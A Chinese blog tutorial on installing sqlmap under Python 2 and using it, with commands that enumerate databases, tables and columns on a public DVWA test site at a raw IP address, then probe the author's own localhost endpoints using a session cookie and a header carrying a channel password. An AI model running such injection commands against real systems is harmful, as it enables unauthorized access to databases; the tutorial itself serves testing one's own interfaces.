sqlmap的安装和基础使用

最新推荐文章于 2024-05-14 13:06:09 发布
最新推荐文章于 2024-05-14 13:06:09 发布
阅读量510 收藏 1
点赞数
分类专栏: 测试 文章标签: sqlmap python 安装 使用
原文链接:https://www.jianshu.com/p/3d3656be3c60
版权

1.sqlmap简介

最白话的介绍就是sqlmap是一个工具,一个用来做sql注入攻击的工具

2.windows安装python2

这个sqlmap需要python2才可以正常执行,注意python3不行哦,如果你已经安装了python3,本地同时安装python2和python3,需要注意修改其中一个python执行文件的名字,以便在path中添加环境变量的时候,可以正确区分,详细这里不进行赘述,如果不了解,建议自行百度。

3. windows安装sqlmap

3.1 下载压缩包

在sqlmap的网站上下载对应的压缩文件
http://sqlmap.org/

3.2 解压文件

解压到任意文件夹皆可
解压以后大概是这个样子的


之后就是要执行这个sqlmap.py的文件

3.3 启动一个命令行,执行sqlmap.py

如果出现这个界面,表示一切正常


按任意键结束

4. 测试sqlmap功能

4.1 使用DVWA测试网站

4.1.1 关于dvwa

这个网站有sql漏洞,专门拿来测试用,不知道是哪位好心人搞出来的

网址是:http://43.247.91.228:81/login.php
登陆的用户名密码是:admin/password

4.1.2 操作

首先登陆成功以后三步走,拿到需要的url

image.png

拿到url以后,就可以使用这个url来注入了

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#"

出现如下结果,则表示sqlmap检测到有可以注入的地方,


ps:如果没有检测到可以注入的地方,会显示如下


image.png

既然检测到有可以注入的地方,现在我们就来通过这个注入来获取一些数据库的信息

获取数据库
python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs

可以看到执行以后拿到了数据库的信息


再进一步,获取数据库中表的信息

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa --tables

可以看到,拿到了dvwa这个库中的所有表的名字


image.png

再进一步,获取表中的字段信息

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users --columns

可以看到,拿到了表中的所有字段


4.2 使用本地网站

4.2.1 本地网站是本地的项目,现在用本地的项目跑起来来测试sqlmap

主要测试三个url:
http://localhost:9099/tjcx/qyzxcx/zscq/sbxx/years?nsrsbh='1234000048500077X3'
http://localhost:9099/record/user/2019-03-09
127.0.0.1:9099/open/qyxx/jcsj_gs?nsrsbh=110101717802684

4.2.2 操作--url1

url1:http://localhost:9099/tjcx/qyzxcx/zscq/sbxx/years?nsrsbh='1234000048500077X3',这是一个post请求,nsrsbh是所需要的参数

执行:

python2 sqlmap.py -u "http://localhost:9099/tjcx/qyzxcx/zscq/sbxx/years?nsrsbh='1234000048500077X3'"  --method=POST

可以看到,没有访问到正确的连接,而是被重定向到了登陆的login页面,这是因为这个网站需要登陆,没有登陆的情况访问链接就会被重定向到登陆页面,所以在这里现在浏览器中登陆,然后拿到浏览器的cookie,让sqlmap携带着cookie再去攻击


拿到浏览器的cookie

执行(携带cookie):

python2 sqlmap.py -u "http://localhost:9099/tjcx/qyzxcx/zscq/sbxx/years?nsrsbh='1234000048500077X3'" --cookie="JSESSIONID=9446902e-703b-4c81-914a-9abbd90ed9ce" --method=POST

执行结果:可以看到,并没有找到可以注入的地方


image.png

观察这个网站的日志,也可以看到,这个接口被调用很多次,都是sqlmap自动调用的,它在尝试寻找可以注入的地方


image.png

4.2.3 操作--url2

url2:http://localhost:9099/record/user/2019-03-09,这是一个get请求,2019-03-09是restful风格的参数

同样携带cookie执行:

python2 sqlmap.py -u "http://localhost:9099/record/user/2019-03-09" --cookie="JSESSIONID=9446902e-703b-4c81-914a-9abbd90ed9ce" --method=GET

执行结果,没有发现可以注入的地方


查看网站后台,接口同样被调用多次

4.2.3 操作--url3

url3:127.0.0.1:9099/open/qyxx/jcsj_gs?nsrsbh=110101717802684,这也是一个get请求,但是不同的是,这个接口不需要cookie就可以访问,但是需要携带正确的header才可以执行

携带header执行:

python2 sqlmap.py -u "127.0.0.1:9099/open/qyxx/jcsj_gs?nsrsbh=110101717802684"  --method=GET --headers="type:pwd\nchannelPwd:f1e7e7f187f84cdfb4784481ed01abd5\nchannelId:FDDX_PWD"

执行结果,没有找到可以注入的地方


查看后台,接口同样被调用多次


5. 总结

简单的使用就是这样,需要一个url,有的可能需要携带cookie,有的可能需要携带header,
如果找到了注入点,就可以拿到一些数据信息,但是现在的网站通常也比较难找到可以注入的url。
可以通过这种方式来检测自己写的接口是否有被sql注入的风险

关于sqlmap的命令还有更深入的,可以通过-h或者--help来查看更多的指令操作,比如不想每次执行语句的时候都要手动确认一些选择项,可以通过--batch指令,让sqlmap自己去决定。

高振05
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap-master
01-04
SQLMap:渗透测试中的神器》 SQLMap是一款开源的自动化SQL注入工具,主要用于检测网站应用程序是否存在SQL...正确理解和使用SQLMap,对于网络安全专业人员和开发者来说,都是提升技能、保障网络环境安全的重要一步。
详细安装sqlmap详细教程
热门推荐
liguangyao213的博客
01-23 3万+
python环境安装+sqlmap快捷方式创建教程 因为sqlmap是用python语言编写所以我们在使用sqlmap之前要先安装python环境 python下载地址:Download Python | Python.org 选择适合自己操作系统的版本 下载成功后双击exe文件自动安装 点击安装后会出现安装进度条 待安装完毕,会出现以下界面,代表你安装成功了。 win+r 输入cmd后回车打开命令行界面 在命令行界面输入python -V查看环境变量
sqlmap安装详细教程
hibugs
03-07 5662
sqlmap是一款自动化的SQL注入工具,其功能为扫描、发现和利用输入URL的SQL注入漏洞,并且内置了许多绕过的插件,支持的数据库也非常多:MySQL、SQLServer、Oracle,Access等等。
最新黑客工具之sqlmap安装教程,超详细使用教程(附工具安装包)(1),2024年最新腾讯T2亲自教你
最新发布
2401_84281601的博客
05-14 1022
这些选项可以用来创建用户自定义函数​​​​​​​--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
windows sqlmap 安装教程
weixin_45642610的博客
01-08 6379
windows sqlmap 安装教程 要有python 2.7的环境 选择对应你电脑的版本 和下载sqlmap 先弄python 把下载好的python2.7放在一个你记得住的目录下后解压缩(如果你有很多工具但不知道他们在哪,从现在开始整理8,不然像我这样乱七八糟的,下载过一次的py2.7都不知道放哪了。此外,有个极大提高搜索文件效率的软件叫 listary 可以自己尝试下载) 解压后复制粘贴python.exe然后重命名为python27,这个用来区别你安装的python3,就算你没安装以后也会用
sqlmap安装使用教程
weixin_63033353的博客
07-28 4366
sqlmap 是一个开源渗透测试工具,可自动检测和利用 SQL 注入缺陷并接管数据库服务器,支持多种数据库和多种注入技术。
sqlmap使用手册集合
06-10
本手册集合将全面介绍SQLMap使用方法和技巧。 一、SQLMap基本概念 SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,控制或获取数据库中的敏感信息。SQLMap通过自动识别和利用这些注入漏洞,可以...
渗透测试工具sqlmap基础教程.docx
10-25
渗透测试工具sqlmap基础教程 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。本文旨在帮助渗透测试的小白入门,介绍sqlmap的...
SQLMAP系列课程视频.rar
11-13
这个"SQLMAP系列课程视频.rar"压缩包文件显然包含了关于如何使用和理解SQLMAP的一系列教学资源。在这个系列课程中,你可能会学习到以下核心知识点: 1. **SQL注入基础**:了解什么是SQL注入,它是如何发生的,以及...
sqlmap。zip
05-27
为了使用SQLMap,你需要先下载并安装Python,然后获取sqlmap的源码或者通过pip安装。在命令行中,你可以输入`sqlmap -h`来查看所有可用的选项和参数,根据实际情况调整参数进行测试。 在实际应用中,理解SQLMap的...
黑客工具之sqlmap安装教程,超详细使用教程(附工具安装包)
qq_44005305的博客
03-05 2151
这些选项可以用来创建用户自定义函数​​​​​​​--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
sqlmap安装使用教程_sqlmap安装使用教程,2024年最新全套学习
2301_78146994的博客
04-13 967
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OMFjB45Y-1690533970055)(https://tuuli-note-image.oss-cn-guangzhou.aliyuncs.com/img/202307280225512.png)]除此之外,还可以查询更多数据,如当前的数据库版本、当前的数据库用户、数据库密码等,可以使用不同的命令执行不同的操作。来查询当前条件下的所有数据,也可以不指定表名,只指定数据库,这样可以查询出该数据库下所有表的所有数据。
Sqlmap安装使用
mashiro_hibiki的博客
03-02 1088
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;2.使用参数化(Parameterized Query 或 Parameterized Statement);
网络安全——SQLMAP基础
weixin_54055099的博客
09-16 1834
SQLMAP基础使用
SQLMAP安装
zrx9988的博客
04-21 465
从头到尾详细安装SQLMAP的步骤
常用的渗透测试工具 ——SQLMap (安装教程&入门教程)
Spontaneous_0的博客
10-27 959
SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB。SQLMap采用了以下5种独特的SQL注入技术。● 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
超详细SQLMap使用攻略及技巧分享
白昼小丑的博客
03-28 910
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站:http://sqlmap.org/, 下载地址:https://github.com/sqlmapproject/sqlmap/zipball/master 演示视
sqlmap安装使用
10-09
安装使用sqlmap,可以按照以下步骤进行操作: 1. 首先,确保你的系统中已经安装了Python解释器。你可以从Python官方网站上下载并安装最新的Python版本。 2. 打开命令行终端,输入以下命令来检查Python是否已安装成功: ``` python --version ``` 如果显示出Python的版本信息,则说明Python已经成功安装。 3. 接下来,你需要安装sqlmap。可以通过以下命令使用pip来安装sqlmap: ``` pip install sqlmap ``` 如果你没有安装pip,可以参考pip官方文档来进行安装:https://pip.pypa.io/en/stable/installation/ 4. 安装完成后,你可以使用以下命令来验证sqlmap是否安装成功: ``` sqlmap --version ``` 如果显示出sqlmap的版本信息,则说明sqlmap已经成功安装。 5. 现在你可以开始使用sqlmap来进行SQL注入测试了。你可以使用以下命令来指定目标URL进行测试: ``` sqlmap -u <target_url> ``` 这将对目标URL进行自动化的SQL注入测试,并输出测试结果和潜在的漏洞。 6. 除了指定目标URL外,sqlmap还支持其他多种选项和参数,例如指定请求数据、设置HTTP头、使用代理等。你可以通过以下命令来查看sqlmap的帮助文档: ``` sqlmap --help ``` 这将显示出sqlmap的详细帮助信息,以及各种可用选项和参数的说明。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值